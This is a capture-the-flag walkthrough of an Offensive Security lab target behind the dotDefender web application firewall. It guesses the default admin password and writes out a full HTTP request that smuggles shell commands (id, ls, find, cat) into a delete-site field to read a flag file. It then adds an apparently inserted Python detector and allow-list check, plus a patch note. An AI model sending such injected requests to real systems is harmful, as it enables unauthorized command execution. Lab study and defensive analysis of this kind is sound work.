Offensive Security n00bFilter Walk Through
How Strong is Your FU hacker challenge
Target 1: N00bFilter
The first target in this weekend's Offensive Security challenge was nicknamed n00bfilter, as it was used to weed out all the n00bs who would plague the internal Offsec networks with high-bandwidth, unnecessary tools such as Nessus or WebInspect hoping for an easy hit. Tools like these, while useful, are not going to directly aid you in the exploitation of this CTF challenge. Your BRAIN is the only valid tool in an Offsec challenge. At first glance n00bfilter appears to be a login prompt to an application with no options other than a username and password field. The source looks pretty standard as well: nothing special, no JavaScript or includes to be had.
First Clue: Error Message
Like most pentests, your first inclination would be to post a single quote or a random character into the field and see if it errors out. After adding a single quote I was presented with a taunting answer of "HAHAHA" rather than the expected SQL error or perhaps an "invalid character" message. Upon further inspection of the error page's source code, it was noted that this was an Applicure error message, Applicure being the vendor of dotDefender, a well-known Web Application Firewall (WAF). I found it interesting that a n00bfilter would be running an IDS/IPS product and started performing further probing of the application.
Annoyance: cool out periods
I then started trying default user/pass combinations such as admin/admin and admin/password, anything that a normal administrator would FAIL to change. This led me nowhere quickly, at which point I started losing my connection to the application. After roughly 5 minutes I was back online and figured my internet connection was foobarred... Got to love sketchy cable connections, right?? I swear they do bandwidth limiting but whatever.. LOL. A few minutes later I was blocked again, and again, and again.... Apparently dotDefender was set to "cool me down" when I got out of control.... Very NOT COOL..... This annoyed me because I was manually probing the application. The application also appeared to vary its cool-outs based on what you were doing: messing with the URL, messing with the input fields, certain characters. Some may be OK, others blocked you immediately, and sometimes only after a few tries... Interesting, the application has a personality apparently.
Thought: Dot Defender bypass
When I started getting owned by dotDefender over and over again, I started to think maybe I had to shut the WAF down or at least add my IP address to a list of friends within dotDefender's configuration. But how??
I immediately started researching dotDefender weaknesses and vulnerabilities on my good friend Google, and this was found...
Full Disclosure:
http://seclists.org/fulldisclosure/2009/Nov/357
The above link states that, post authentication, there is a vulnerability that allows an attacker to run commands on the operating system via the delete site method. Hmmm, "post authentication". This means I need credentials. Bollocks!! I don't have credentials.
OK, back to Google. The Google gods then provided me with a few tidbits of information regarding dotDefender, one useful piece being that the dotDefender site manager was located at /dotDefender. I browsed to this address and sure enough I was prompted with a basic authentication login prompt that told me its username was "Admin". Now I have a login name; the struggle is half over, right? So I tried all the default password combos and a few random passwords based on the site and the challenge.
FAIL
Don't Second Guess Yourself:
Figuring that a vulnerability on Full Disclosure was not going to be the issue, especially being post-auth on a n00bFilter, I moved back to probing the app... I went at it for a while with combinations of character encodings and character assembly that might fool the WAF into either letting my attacks through the firewall or removing just enough of the attack to reassemble the attack for me, attacks such as <scr><script>ipt> or other combinations using various encoding techniques...
Again FAIL!!
Social Networking:
So I remembered the hints said to stay in touch via Twitter and IRC. I popped up the IRC channel and it's a bunch of whiners complaining about a password being changed.. I was just thinking "WHAT PASSWORD". I felt out of the loop at that point, but I know better than to ask Muts a direct question; I already know the answer.. "TRY HARDER". This is Offensive Security's mantra, which answers every inquiry. So instead I got some Red Bull and thought it over for a few, and noticed that the IRC channel said the passwords were now reset to the original values.
Dot Defender again:
Knowing that the only password not behind dotDefender's tyrannical rule was the basic auth login for dotDefender itself, I decided to give dotDefender a second go. The very first combination I tried popped open the application with the password "password" and a # symbol at the end of the index page value; someone had suggested I try the # earlier.
Apparently the first few people past the login started changing the password to keep others from catching up to them.... Sneaky little terrorists threw me off my game. So now it was time to try my post-authentication exploitation from Full Disclosure.. :)
Post Auth:
Opening up Burp Proxy, a well-known application proxy, I started browsing the dotDefender site manager. I was presented with a page that allowed me to add and DELETE sites. I created a fake test site and then set my proxy to capture a request. Once I captured a request I sent it over to a module in Burp by the name of "Repeater"; Repeater allows you to keep making the request over and over again while manually manipulating the values. Since I had an example delete request and I had the delete example from the Full Disclosure vulnerability, I modified my request with the vulnerable values:
POST /dotDefender/index.cgi HTTP/1.1
Host: www1.noob-filter.com
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www1.noob-filter.com/dotDefender/index.cgi
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

sitename=testsite&deletesitename=testsite;id;ls -al;pwd;&action=deletesite&linenum=12
In the web response was the output of my command injection. I injected an "ls" command, which in Unix lists the contents of a directory. I thought to myself, OK, so that's cool, but I need to find a certain file to show that I passed the challenge. Running Burp requests looking for this file is waaaaay too tedious for me. So I used another familiar Unix command, the "find" command.
sitename=testsite&deletesitename=testsite;id;find / -name 'n00bSecret.txt';pwd;&action=deletesite&linenum=12
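As an added illustration (not part of the original write-up and not dotDefender's own code), the following Python takes the captured POST body from the request above, parses it on "&" only, and flags any field carrying shell metacharacters, pulling out the extra commands a shell would have run; it also shows the allow-list check a hardened delete-site handler would apply before a site name ever reaches a shell. The /var/sites path, the rm argv and the allow-list pattern are assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# POST body captured in the write-up (the delete-site request with injected commands)
CAPTURED_BODY = ("sitename=testsite&deletesitename=testsite;id;ls -al;pwd;"
                 "&action=deletesite&linenum=12")

# Characters that let a value break out of a command line when handed to sh -c
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")
# Allow-list for a site name: hostname-like, nothing else (assumed policy)
SITE_NAME_OK = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def parse_form(body: str) -> Dict[str, List[str]]:
    """Split a form-urlencoded body on '&' only (never on ';'), decoding each value."""
    fields: Dict[str, List[str]] = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return fields


def find_injection(body: str) -> Dict[str, List[str]]:
    """Detection: {field: [command segments]} for every field containing shell metacharacters."""
    hits: Dict[str, List[str]] = {}
    for key, values in parse_form(body).items():
        for value in values:
            if SHELL_META.search(value):
                # Everything after the first separator is what a shell would run as extra commands
                segments = [s.strip() for s in re.split(r"[;&|]", value)[1:] if s.strip()]
                hits.setdefault(key, []).extend(segments)
    return hits


def validate_site_name(name: str) -> bool:
    """Mitigation: accept only names matching the allow-list; reject everything else."""
    return SITE_NAME_OK.match(name) is not None


def delete_site_argv(name: str, base: str = "/var/sites") -> List[str]:
    """Hardened delete-site handler (hypothetical): validate first, then build an argv
    vector for subprocess.run(argv) with shell=False, so no shell ever parses the name."""
    if not validate_site_name(name):
        raise ValueError(f"rejected site name: {name!r}")
    return ["rm", "-rf", f"{base}/{name}"]
```

Run over the captured body, find_injection reports the deletesitename field with the segments id, ls -al and pwd, while the same value is rejected outright by validate_site_name.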
Score:
The n00bSecret file was found quickly, so I used the "cat" command to list out the contents of the file with the proof of passing the first challenge.
Request:
sitename=testsite&deletesitename=testsite;id;cat /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt;pwd;&action=deletesite&linenum=12
Response:
9f9b0b7d2db411c10b517b547a8693d831d3aa936aba4d54b51d30b5a182c05b1f7a5759fd7d5ef64e5485e5d3e3a214dd6b4b78a733566556b2887a6b9a6299
I browsed out to the contest scoreboard page and added in my shiny new proof key immediately, since I knew there was a 10 minute time limit between exploitation and acceptance. Accepted: 25 points added to my account, and a shiny new VPN login will be provided to me within 5 minutes' time!!!
Mexican food:
At this point I decided it was time for some Mexican food; I had been fiending for some chips and salsa all day long. I passed the n00b challenge as the 30th contender out of a possible 100 slots. Note that the 100 slots were not filled until 24 hours after this point.. :) Not too horrible, but again could be much better!!
Lessons Learned:
Don't second guess your observations and research. I was thrown off the path because sneaky contestants were changing the scope of the competition. Observe every detail of the source and of what you are presented with, and try things more than once! They just might work the second time... At this point 5 hours of the competition were wasted on something that should have taken me less than 2 hours, or even 30 min if I was quick with it.
Dot Defender Remediation:
There is a patch available for this vulnerability from Applicure, so just patch your app!! Also, according to this other post by Applicure, it only affects Linux running Apache. Response by Applicure in the link below.
http://seclists.org/bugtraq/2009/Dec/123
Next up, how to own killthen00b